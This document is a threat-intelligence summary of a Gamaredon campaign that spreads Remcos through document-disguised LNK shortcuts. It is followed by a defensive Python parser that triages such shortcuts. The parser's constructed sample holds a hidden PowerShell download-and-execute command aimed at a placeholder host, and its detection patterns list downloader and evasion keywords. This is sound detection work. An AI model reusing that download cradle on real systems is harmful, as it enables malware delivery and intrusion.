Gamaredon campaign abuses LNK files to distribute Remcos backdoor

NetmanageIT OpenCTI - opencti.netmanageit.com

SUMMARY :

Since November 2024, a campaign has targeted users in Ukraine with malicious LNK files delivered through phishing that uses the invasion of Ukraine as its theme. The shortcuts are disguised as Office documents, and their file names use Russian words related to troop movements as lures. Opening one runs a PowerShell downloader that contacts geo-fenced servers located in Russia and Germany, mostly hosted by the GTHost and HyperHosting ISPs. The second-stage payload uses DLL sideloading to load and execute the Remcos backdoor, which then communicates with its C2 server on a specific port. The activity is attributed to the Gamaredon threat actor group with medium confidence.
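The first stage of the chain above (a shortcut that looks like a document but starts a hidden PowerShell downloader) is what a triage script should catch before the second stage is ever fetched. What follows is an added example, not code from the report or from the actor: a minimal MS-SHLLINK parser and a rule that flags shortcuts whose target or arguments invoke PowerShell with download or evasion keywords, start minimized, or borrow an Office icon. The sample shortcut bytes are constructed inside the script; its PowerShell command line, URL and icon path are placeholders, not indicators from the campaign.

```python
"""Minimal MS-SHLLINK (.lnk) parser with a triage rule for shortcuts that launch
a PowerShell downloader while posing as a document. Added example; not code
from the report or from the actor. The sample bytes are constructed below."""
import re
import struct
import sys
from dataclasses import dataclass, field

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits from MS-SHLLINK section 2.1.1; StringData fields follow in this fixed order.
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                 (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location"))
SW_SHOWMINNOACTIVE = 7  # window starts minimized; a common choice in malicious LNKs


@dataclass
class LnkInfo:
    flags: int
    show_command: int
    strings: dict = field(default_factory=dict)


def _read_string(buf: bytes, off: int, unicode: bool):
    """Read one StringData entry: 2-byte character count followed by the characters."""
    (count,) = struct.unpack_from("<H", buf, off)
    off += 2
    width = 2 if unicode else 1
    raw = buf[off:off + count * width]
    return raw.decode("utf-16-le" if unicode else "latin-1"), off + count * width


def parse_lnk(buf: bytes) -> LnkInfo:
    if len(buf) < LNK_HEADER_SIZE or buf[:4] != b"\x4c\x00\x00\x00" or buf[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    (flags,) = struct.unpack_from("<I", buf, 20)         # LinkFlags
    (show_command,) = struct.unpack_from("<I", buf, 60)  # ShowCommand
    off = LNK_HEADER_SIZE
    if flags & HAS_ID_LIST:          # skip LinkTargetIDList: 2-byte size plus items
        off += 2 + struct.unpack_from("<H", buf, off)[0]
    if flags & HAS_LINK_INFO:        # skip LinkInfo: its size field counts itself
        off += struct.unpack_from("<I", buf, off)[0]
    info = LnkInfo(flags, show_command)
    for bit, name in STRING_FIELDS:
        if flags & bit:
            info.strings[name], off = _read_string(buf, off, bool(flags & IS_UNICODE))
    return info


POWERSHELL_RE = re.compile(r"powershell(\.exe)?|\bpwsh\b", re.I)
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|invoke-expression|"
                         r"frombase64string|\b(iex|iwr|hidden|bypass|enc|encodedcommand)\b", re.I)
DOC_LURE_RE = re.compile(r"(winword|excel|powerpnt|acrord32)\.exe|\.(docx?|xlsx?|pptx?|pdf)$", re.I)


def triage_lnk(info: LnkInfo) -> list:
    """Return the reasons a shortcut looks like a document-themed PowerShell dropper."""
    reasons = []
    target = info.strings.get("relative_path", "") + " " + info.strings.get("working_dir", "")
    args = info.strings.get("arguments", "")
    if POWERSHELL_RE.search(target) or POWERSHELL_RE.search(args):
        reasons.append("launches PowerShell")
    if DOWNLOAD_RE.search(args):
        reasons.append("arguments contain download/evasion keywords")
    if info.show_command == SW_SHOWMINNOACTIVE:
        reasons.append("window starts minimized (SW_SHOWMINNOACTIVE)")
    if DOC_LURE_RE.search(info.strings.get("icon_location", "")):
        reasons.append("icon masquerades as a document")
    return reasons


def build_lnk(relative_path: str, arguments: str, icon_location: str,
              show_command: int = SW_SHOWMINNOACTIVE) -> bytes:
    """Assemble a minimal LNK (no IDList, no LinkInfo) with Unicode StringData."""
    flags = HAS_REL_PATH | HAS_ARGS | HAS_ICON | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x80, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def enc(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + enc(relative_path) + enc(arguments) + enc(icon_location)


# Constructed samples: the lure imitates the chain described above, but the path,
# URL and file names are placeholders, not indicators from the report.
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/stage2')\"",
    r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
)
BENIGN_LNK = build_lnk(r"..\..\Windows\notepad.exe", "",
                       r"%SystemRoot%\system32\notepad.exe", show_command=1)


def triage_bytes(buf: bytes) -> list:
    return triage_lnk(parse_lnk(buf))


if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, triage_bytes(fh.read()))
    if len(sys.argv) == 1:
        print("sample:", triage_bytes(SAMPLE_LNK))
        print("benign:", triage_bytes(BENIGN_LNK))
```

Run it with no arguments to triage the two built-in samples, or pass .lnk files on the command line. The parser skips the LinkTargetIDList and LinkInfo blocks by size; a dropper can put its real target only in the IDList and leave the StringData empty, so a production check should decode that block as well rather than rely on RELATIVE_PATH alone.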

OPENCTI LABELS :

powershell,phishing,ukraine,remcos,lnk files,dll sideloading,gthost,hyperhosting